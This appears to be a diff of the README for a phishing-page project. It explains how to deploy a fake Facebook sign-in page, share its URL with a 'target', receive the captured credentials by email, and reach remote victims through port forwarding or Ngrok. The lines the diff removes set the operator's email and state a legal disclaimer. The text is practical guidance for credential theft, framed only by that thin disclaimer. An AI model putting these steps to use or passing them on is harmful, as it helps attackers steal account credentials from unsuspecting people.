sachin-acharya-projects/Phising_Page/README.md

 After the server is started, all you have to do is share the URL `https://localhost:3000` with your target.
 Once the target sign-in to "Facebook" through the phishing site, you will get mail to the email provided in the code with the target's credentials.

 If you want to phish remotely, you either have to `PORT Forward` the required port i.e.` 3000`, or use Tunneling Host: [Ngrok](https://ngrok.com/)

-## NOTE
-__MUST CHANGE THE ASSISGNMENT OF VARIABLE USEREMAIL AND USERPASS TO YOUR CREDENTIALS OR CREATE ENVIRONMENT WITH NAME useremail / userpass for Credential__
-__Email, containing phished data will be send to above email address.__

-## IMPORTANT
-__ANYTHING UNUSUAL OR ILLEGAL HAPPENED, I WILL NOT BE SOME TO BLAME.
-USE THIS TEMPLATE ONLY FOR LEGAL PURPOSE OR WITH SOMEONE PERMISSION.
-DO NOT USE FOR ILLEGAL PURPOSE__